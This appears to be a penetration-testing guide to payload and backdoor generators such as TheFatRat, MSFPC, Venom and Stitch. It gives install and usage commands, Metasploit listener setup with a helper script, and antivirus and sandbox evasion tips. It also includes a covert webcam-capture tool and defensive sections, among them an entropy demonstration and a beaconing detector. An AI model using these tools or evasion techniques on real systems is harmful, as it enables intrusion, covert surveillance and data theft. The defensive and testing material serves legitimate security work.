Critical Security Warning: These tools create malicious payloads and should ONLY be used in authorized penetration testing environments. Creating or distributing malware without authorization is illegal. Always obtain explicit written permission before using these tools.

Overview

Payload creation tools help security professionals generate custom backdoors and payloads for authorized penetration testing. These tools:
  • Generate payloads designed to evade antivirus and EDR detection
  • Build backdoors for multiple platforms
  • Automate payload obfuscation and encoding
  • Provide reverse-shell and Meterpreter-style command-and-control
  • Support post-exploitation testing
  • Measure how effective the endpoint protection in scope actually is
All payload creation should be performed in isolated lab environments with proper security controls.

Tools covered on this page:
  • TheFatRat: menu-driven generator for backdoors intended to evade common antivirus products
  • MSFPC (MSFvenom Payload Creator): wrapper that simplifies Metasploit's msfvenom payload generator
  • Venom: shellcode generator that can stage payloads through a local Apache2 server
  • Stitch: cross-platform Python remote administration tool (RAT)

Available Payload Creation Tools

Multi-Platform Payload Generators

TheFatRat

Description: TheFatRat provides an easy way to create backdoors and payloads which can bypass many anti-virus products.
Installation:
git clone https://github.com/Screetsec/TheFatRat.git
cd TheFatRat
sudo chmod +x setup.sh
sudo bash setup.sh   # installs dependencies; run once, it does not build payloads
Usage:
cd TheFatRat
./fatrat             # launcher script in the repository root; opens the interactive menu
Features:
  • Multiple Payload Types: Windows, Linux, macOS, Android
  • AV Evasion: Built-in obfuscation techniques
  • Easy Interface: User-friendly menu system
  • Metasploit Integration: Works with MSF framework
  • Custom Backdoors: Create tailored payloads
Payload Types:
  • Windows backdoors (exe, dll)
  • Android APK backdoors
  • Powershell payloads
  • Macro-based payloads
  • PDF/Office document payloads
Additional Commands:
# Update TheFatRat
cd TheFatRat
bash update
chmod +x setup.sh
bash setup.sh

# Troubleshoot installation
cd TheFatRat
sudo chmod +x chk_tools
./chk_tools
GitHub: Screetsec/TheFatRat
MSFPC (MSFvenom Payload Creator)

Description: MSFvenom Payload Creator is a wrapper that generates multiple types of payloads based on user choice, simplifying the payload creation process.
Installation:
git clone https://github.com/g0tmi1k/msfpc.git
cd msfpc
sudo chmod +x msfpc.sh
Usage:
cd msfpc

# Show help and version
sudo bash msfpc.sh -h -v

# Generate Windows payload
./msfpc.sh windows

# Generate Linux payload
./msfpc.sh linux

# Generate Android payload
./msfpc.sh apk
Features:
  • Simplified MSFvenom interface
  • Multiple payload formats
  • Automatic listener setup: writes a matching msfconsole resource (.rc) file next to each payload
  • Batch payload generation
  • Template-based creation
Supported Platforms:
  • Windows (exe, dll, msi)
  • Linux (elf)
  • macOS (macho)
  • Android (apk)
  • Python, PHP, ASP
  • Java (jar, war)
GitHub: g0tmi1k/msfpc
Venom

Description: Venom 1.0.11 uses an Apache2 web server to deliver payloads via fake web pages, providing a ready-made malicious web server for lab delivery.
Installation:
git clone https://github.com/r00t-3xp10it/venom.git
sudo chmod -R 775 venom*/
cd venom*/
cd aux
sudo bash setup.sh
cd ..          # back to the repository root, where venom.sh lives

# Update Venom
sudo ./venom.sh -u
Usage:
cd venom
sudo ./venom.sh
Features:
  • Apache2 Integration: Deploy payloads via web server
  • Fake Webpages: Deliver payloads through legitimate-looking pages
  • LAN Delivery: Target local network systems
  • Multiple Encoders: Bypass AV detection
  • Automation: Automated payload delivery
Use Cases:
  • LAN-based payload delivery
  • Web-based exploitation
  • Social engineering attacks
  • Internal penetration testing
GitHub: r00t-3xp10it/venom

Remote Administration Tools

Stitch

Description: Stitch is a Cross-Platform Python Remote Administrator Tool with support for Windows, macOS, and Linux. The code base targets Python 2, so on a current distribution run it with a Python 2 interpreter in a dedicated virtual environment rather than the system python.
Installation:
git clone https://github.com/nathanlopez/Stitch.git
cd Stitch

# Linux installation (Python 2 pip)
sudo pip install -r lnx_requirements.txt
Usage:
cd Stitch
sudo python main.py
Features:
  • Cross-Platform: Windows, macOS, Linux support
  • Remote Control: Full system access
  • File Operations: Upload/download files
  • Command Execution: Run arbitrary commands
  • Persistence: Maintain access across reboots
Platform-Specific Requirements:
  • Linux: lnx_requirements.txt
  • Windows: Refer to documentation
  • macOS: Refer to documentation
For Windows and macOS installation instructions, refer to the project documentation.
Website: nathanlopez.github.io/Stitch

Specialized Payload Tools

Brutal

Description: Brutal is a toolkit to quickly create various payloads, PowerShell attacks and virus attacks, and to launch listeners for Human Interface Device (HID) attacks.
Installation:
git clone https://github.com/Screetsec/Brutal.git
cd Brutal
sudo chmod +x Brutal.sh
Usage:
cd Brutal
sudo bash Brutal.sh
Requirements:
  • Arduino Software (v1.6.7 or higher)
  • TeensyDuino
  • Linux udev rules
  • PaensyLib folder in Arduino libraries
Installation Guide: see the Brutal Wiki, "Install Requirements".
Features:
  • HID attack payloads
  • PowerShell attack scripts
  • Teensy/Arduino support
  • Rubber Ducky payloads
  • Automated attack sequences
Attack Types:
  • USB Rubber Ducky attacks
  • Teensy-based attacks
  • PowerShell execution
  • Payload injection
GitHub: Screetsec/Brutal
spycam

Description: Generates a Win32 payload that captures webcam images every minute and sends them back to the operator.
Installation:
git clone https://github.com/indexnotfound404/spycam.git
cd spycam
bash install.sh
chmod +x spycam
Usage:
cd spycam
./spycam
Features:
  • Automated webcam capture
  • Periodic image collection (1-minute intervals)
  • Remote image transmission
  • Windows target support
Use Cases:
  • Physical security testing
  • Social engineering assessment
  • Awareness training demonstrations
GitHub: indexnotfound404/spycam

Mobile & Android Payloads

Mob-Droid

Description: Mob-Droid generates Metasploit Android payloads without the operator typing out long msfvenom commands.
Installation:
git clone https://github.com/kinghacker0/mob-droid.git
Usage:
cd mob-droid
sudo python mob-droid.py
Features:
  • Simplified Android payload generation
  • Metasploit integration
  • Multiple payload options
  • Easy-to-use interface
  • Automatic APK creation
Generated Payloads:
  • Android Meterpreter
  • Reverse TCP connections
  • Reverse HTTP/HTTPS
  • Custom LHOST/LPORT
GitHub: kinghacker0/Mob-Droid
Enigma

Description: Enigma is a multiplatform payload dropper for various operating systems.
Installation:
git clone https://github.com/UndeadSec/Enigma.git
Usage:
cd Enigma
sudo python enigma.py
Features:
  • Multi-platform support
  • Payload dropping capabilities
  • Various payload formats
  • Easy deployment
Supported Platforms:
  • Windows
  • Linux
  • Android
  • macOS
GitHub: UndeadSec/Enigma

Payload Development Workflow

  1. Requirements Analysis: identify target platform, required capabilities, and evasion requirements
  2. Payload Generation: use the appropriate tool to generate a payload with the desired functionality
  3. Obfuscation: apply encoding and obfuscation techniques to evade detection
  4. Testing: test the payload in an isolated environment against the security controls in scope
  5. Handler Setup: configure and start the listener that will receive connections from the payload
  6. Delivery: deploy the payload through the authorized delivery mechanism
The listener must be running before the payload executes: a reverse-connect payload that finds nothing listening simply fails, and the delivery opportunity is wasted.

Evasion Techniques

Antivirus Bypass Methods

  • Encoding: multiple encoding layers to obscure the payload's byte signature
  • Encryption: encrypt the payload and decrypt it at runtime
  • Obfuscation: modify code structure and variable names
  • Packing: use custom packers to compress and hide the payload

Best Practices for AV Evasion

Evasion Testing Tips:
  • Use multiple encoding iterations
  • Avoid known malicious signatures
  • Test against the target's AV/EDR in an isolated lab copy before deployment; do not upload samples to public multi-engine scanners, which share submissions with vendors and burn the payload
  • Use custom templates instead of the tool defaults, which are heavily signatured
  • Implement time-based or environment-based execution to defeat sandbox detonation
  • Utilize living-off-the-land binaries (LOLBins)
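A caveat on the Encoding, Encryption and Packing entries above: they change how a file looks to a signature scanner, but they also change its byte statistics, and byte entropy is one of the oldest heuristic indicators of a packed or encrypted payload. The Python below is an added example (not code from any tool on this page) that measures this on a constructed buffer standing in for a payload. It shows that single-byte XOR leaves Shannon entropy unchanged (it only permutes byte values), while keystream-style encryption drives it toward the 8 bits/byte that a heuristic scanner flags. The sample buffer, the 7.0 threshold and the function names are our own assumptions.

```python
"""Shannon entropy as a packing/encryption indicator.

Added example, not code from any tool on this page.  The sample buffer is a
constructed stand-in (a repeated PE-like header fragment), not shellcode.
"""
import math
import random
from collections import Counter


def shannon_entropy(data: bytes) -> float:
    """Bits per byte: 0.0 for a constant buffer, 8.0 for uniformly random bytes."""
    if not data:
        return 0.0
    n = len(data)
    return -sum((c / n) * math.log2(c / n) for c in Counter(data).values())


def xor_single_byte(data: bytes, key: int) -> bytes:
    """The classic one-byte XOR 'encoder'.  Each byte value maps to exactly one
    other value, so the histogram is only relabelled and the entropy is identical."""
    return bytes(b ^ key for b in data)


def xor_keystream(data: bytes, seed: int) -> bytes:
    """Stand-in for a stream cipher or packer: XOR with a pseudo-random keystream
    (seeded so the example is reproducible; a real crypter would use a CSPRNG)."""
    rng = random.Random(seed)
    return bytes(b ^ rng.getrandbits(8) for b in data)


def looks_packed(data: bytes, threshold: float = 7.0) -> bool:
    """Crude per-section rule of the kind static heuristics apply (assumed threshold)."""
    return shannon_entropy(data) > threshold


# Constructed stand-in for a payload: 4120 bytes of mostly zeros plus ASCII.
SAMPLE = (b"MZ" + b"\x00" * 60 + b"This program cannot be run in DOS mode.\r\n") * 40


def compare(data: bytes = SAMPLE) -> dict:
    """Entropy of the plain buffer and of its two transformed versions."""
    return {
        "plain": round(shannon_entropy(data), 3),
        "xor_single_byte": round(shannon_entropy(xor_single_byte(data, 0x5A)), 3),
        "xor_keystream": round(shannon_entropy(xor_keystream(data, seed=7)), 3),
    }


if __name__ == "__main__":
    for name, h in compare().items():
        print(f"{name:16s} {h:5.3f} bits/byte  flagged as packed: {h > 7.0}")
```

Single-byte XOR defeats a byte-pattern signature and nothing else; the stronger transforms that defeat more signatures are exactly the ones that make the file look encrypted. Entropy says nothing about behaviour, so this only illustrates the static side of the detection stack.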

Example Workflows

Generate Windows Backdoor

# Using TheFatRat (setup.sh only installs dependencies; fatrat is the launcher)
cd TheFatRat
./fatrat
# Select the option for a Windows backdoor
# Configure LHOST and LPORT
# Generate payload

# Using MSFPC
cd msfpc
./msfpc.sh windows
# Follow prompts for configuration

Create Android Payload

# Using Mob-Droid
cd mob-droid
sudo python mob-droid.py
# Select payload type
# Set LHOST and LPORT
# Generate APK

# Using TheFatRat
cd TheFatRat
./fatrat
# Select the Android APK option
# Configure settings
# Build APK

Setup Listener

# Start Metasploit
msfconsole

# Configure handler. The payload string must be exactly the one the generator
# was given (staged vs stageless, and the transport), or no session appears.
use exploit/multi/handler
set payload windows/meterpreter/reverse_tcp
set LHOST <your_ip>
set LPORT <your_port>
exploit -j
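The handler above is typed interactively; on an engagement it is usually kept as an msfconsole resource script and loaded with `msfconsole -r handler.rc`. The Python below, an added example rather than code from Metasploit or from any tool on this page, renders such a script and catches the two mistakes that most often produce a listener that never receives a session: a malformed LHOST/LPORT, and a handler payload that differs from the payload the generator was given (a staged `meterpreter/reverse_tcp` handler cannot serve a stageless `meterpreter_reverse_tcp` client). The function names are our own, and the staged/stageless check is a heuristic on the meterpreter/shell naming convention, not an exhaustive parser of Metasploit payload names.

```python
"""Render and sanity-check an exploit/multi/handler resource script.

Added example, not Metasploit code.  Helper names are our own.
"""
import ipaddress
from typing import List, Optional


def is_staged(payload: str) -> bool:
    """Heuristic from Metasploit naming: staged payloads keep the connection type as
    a separate path component (windows/meterpreter/reverse_tcp); stageless ones fuse
    it into the last component (windows/meterpreter_reverse_tcp).  Covers the
    meterpreter and shell families; not an exhaustive parser."""
    last = payload.rsplit("/", 1)[-1]
    return not ("_reverse_" in last or "_bind_" in last)


def check_handler_config(payload: str, lhost: str, lport: int,
                         generated_payload: Optional[str] = None) -> List[str]:
    """Return a list of problems; an empty list means the handler should work."""
    problems = []
    try:
        ipaddress.ip_address(lhost)
    except ValueError:
        problems.append(f"LHOST is not a valid IP address: {lhost!r}")
    if not 1 <= int(lport) <= 65535:
        problems.append(f"LPORT out of range: {lport}")
    if "/" not in payload:
        problems.append(f"payload must be a full Metasploit path: {payload!r}")
    if generated_payload is not None and generated_payload != payload:
        msg = (f"handler payload {payload!r} differs from generated payload "
               f"{generated_payload!r}")
        if is_staged(payload) != is_staged(generated_payload):
            msg += " (staged/stageless mismatch: the client connects but no session forms)"
        problems.append(msg)
    return problems


def generate_handler_rc(payload: str, lhost: str, lport: int,
                        generated_payload: Optional[str] = None) -> str:
    """Text of a handler.rc; raises ValueError if the configuration is inconsistent."""
    problems = check_handler_config(payload, lhost, lport, generated_payload)
    if problems:
        raise ValueError("; ".join(problems))
    lines = [
        "use exploit/multi/handler",
        f"set payload {payload}",
        f"set LHOST {lhost}",
        f"set LPORT {lport}",
        "set ExitOnSession false",  # keep listening after the first session arrives
        "exploit -j -z",             # background job, do not auto-interact
    ]
    return "\n".join(lines) + "\n"


if __name__ == "__main__":
    # Assumed engagement values; the generated payload string is what msfvenom was given.
    print(generate_handler_rc("windows/x64/meterpreter/reverse_https", "10.0.0.5", 443,
                              generated_payload="windows/x64/meterpreter/reverse_https"))
```

Start the listener with `msfconsole -q -r handler.rc` before the payload is delivered; `ExitOnSession false` keeps the job alive for second and later callbacks instead of tearing the handler down after the first one.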

Payload Types Comparison

Payload Type | Platform       | Use Case              | Stealth
EXE          | Windows        | Desktop/Server        | Medium
DLL          | Windows        | Injection/Persistence | High
APK          | Android        | Mobile devices        | Medium
ELF          | Linux          | Server/Desktop        | Medium
Macro        | Office         | Document-based        | High
PowerShell   | Windows        | Fileless attacks      | Very High
Python       | Cross-platform | Scripting             | High

The stealth column is a rough, tool-agnostic rating. On a current Windows build with Script Block Logging, Module Logging and AMSI enabled, PowerShell is one of the best-instrumented execution paths available, so its rating only holds on hosts where that telemetry is absent.

Security Testing Scenarios

Antivirus Testing

Objective: Assess endpoint protection effectiveness
Process:
  1. Generate baseline payload with default settings
  2. Test detection rate
  3. Apply obfuscation techniques
  4. Retest with modified payload
  5. Document detection results
  6. Recommend improvements
Metrics:
  • Detection rate before/after obfuscation
  • Time to detection
  • Response actions taken
  • False positive rate

Red Team Operations

Objective: Test organizational security posture
Phases:
  1. Initial Access: Deliver payload via authorized method
  2. Execution: Achieve code execution on target
  3. Persistence: Maintain access across reboots
  4. Privilege Escalation: Gain higher-level access
  5. Defense Evasion: Avoid detection by security tools
  6. Credential Access: Harvest credentials
  7. Discovery: Enumerate environment
  8. Lateral Movement: Spread to other systems
  9. Collection: Gather sensitive data
  10. Exfiltration: Remove data from network
Critical Legal Requirements:
  1. Written Authorization: Obtain explicit written permission
  2. Scope Definition: Clearly define authorized systems and activities
  3. Legal Review: Have authorization reviewed by legal counsel
  4. Compliance: Follow all applicable laws and regulations
  5. Liability: Understand potential legal and liability issues
  6. Criminal Laws: Be aware of computer fraud and abuse laws

Responsible Use

Ethical Guidelines:
  • Only create payloads for authorized testing
  • Store payloads securely in isolated environments
  • Never distribute payloads publicly
  • Delete payloads after testing completion
  • Document all payload creation and usage
  • Follow responsible disclosure for vulnerabilities found
  • Maintain professional certifications and standards

Detection and Defense

How to Detect Malicious Payloads

  • Signature Detection: traditional AV matching known malware signatures (hashes, byte patterns, YARA-style rules); defeated by trivial re-encoding
  • Behavioral Analysis: monitoring for suspicious runtime behaviour (process injection, unexpected child processes, regular outbound beacons) regardless of how the file on disk looks
  • Sandboxing: detonating files in an isolated environment and observing what they do; payloads with time- or environment-based execution gates are built to get past this layer
  • Heuristic and ML Analysis: static and dynamic rules, or learned models, that score suspicious traits such as high-entropy sections, unusual imports or suspicious API call sequences

Defense Recommendations

  • Implement application allow-listing (for example AppLocker or Windows Defender Application Control)
  • Use an EDR solution that records process, network and injection telemetry
  • Enable PowerShell Script Block Logging and Module Logging, and enforce Constrained Language Mode where possible
  • Deploy network segmentation and egress filtering so a reverse shell cannot reach an arbitrary internet host
  • Monitor for unusual outbound connections, in particular regular low-volume connections from unexpected processes
  • Regular security awareness training
  • Patch management and vulnerability scanning
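To make the last two recommendations concrete: a reverse shell whose handler is down and retrying, or a Meterpreter reverse_http(s) transport polling on its interval, produces outbound connections at a regular cadence from a process that has no business talking to the internet. The Python below is an added example (not code from Sysmon, any EDR, or any tool on this page) that runs a simple beaconing check over constructed, simplified network-connection events in a Sysmon Event ID 3-like shape. It groups connections by (process image, destination), measures the inter-arrival gaps and flags series whose jitter is low. The line format, the thresholds, the paths and the addresses are all constructed for the example.

```python
"""Beaconing detector over constructed process-network events.

Added example, not Sysmon or EDR code.  The line format is our own
simplification of a Sysmon Event ID 3 (network connection) record.
"""
import re
import statistics
from collections import defaultdict
from datetime import datetime, timedelta

LINE_RE = re.compile(r"^(?P<ts>\S+) NetworkConnect image=(?P<image>.+?) dst=(?P<dst>\S+)$")


def parse(lines):
    """Yield (timestamp, image, dst) for each well-formed line; skip the rest."""
    for line in lines:
        m = LINE_RE.match(line)
        if m:
            yield datetime.fromisoformat(m["ts"]), m["image"], m["dst"]


def find_beacons(lines, min_connections=5, max_jitter=0.2):
    """Return {(image, dst): mean_gap_seconds} for connection series that are long
    enough and whose gaps are regular (coefficient of variation below max_jitter).
    Human-driven traffic (browsers, interactive tools) has irregular gaps."""
    series = defaultdict(list)
    for ts, image, dst in parse(lines):
        series[(image, dst)].append(ts)
    beacons = {}
    for key, stamps in series.items():
        if len(stamps) < min_connections:
            continue
        stamps.sort()
        gaps = [(b - a).total_seconds() for a, b in zip(stamps, stamps[1:])]
        mean = statistics.mean(gaps)
        if mean <= 0:
            continue
        if statistics.pstdev(gaps) / mean < max_jitter:
            beacons[key] = round(mean, 1)
    return beacons


def constructed_log():
    """Constructed sample: one implant-like process calling back every ~60 s with a
    few seconds of jitter, and a browser with human-driven, irregular connections."""
    t0 = datetime(2024, 5, 1, 9, 0, 0)
    lines = []
    t = t0
    for jitter in (0, 2, -1, 1, -2, 0, 1, -1):
        t += timedelta(seconds=60 + jitter)
        lines.append(f"{t.isoformat()} NetworkConnect "
                     f"image=C:\\Users\\bob\\AppData\\Local\\Temp\\update.exe dst=203.0.113.7:4444")
    for offset in (5, 9, 70, 71, 300, 301, 900, 1500):
        t = t0 + timedelta(seconds=offset)
        lines.append(f"{t.isoformat()} NetworkConnect "
                     f"image=C:\\Program Files\\Mozilla Firefox\\firefox.exe dst=198.51.100.20:443")
    return lines


if __name__ == "__main__":
    for (image, dst), gap in find_beacons(constructed_log()).items():
        print(f"possible beacon: {image} -> {dst} every {gap}s")
```

Real implants add sleep jitter precisely to defeat this, so in production the check is combined with process reputation (a binary in a user-writable Temp directory talking to a raw IP on port 4444 is suspicious on its own) and with egress filtering that denies the connection outright.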

Training and Certifications

  • OSCP - Offensive Security Certified Professional
  • CRTO - Certified Red Team Operator
  • PNPT - Practical Network Penetration Tester
  • eCPPT - eLearnSecurity Certified Professional Penetration Tester

Practice Environments

  • HackTheBox
  • TryHackMe
  • PentesterLab
  • VulnHub
  • SANS NetWars
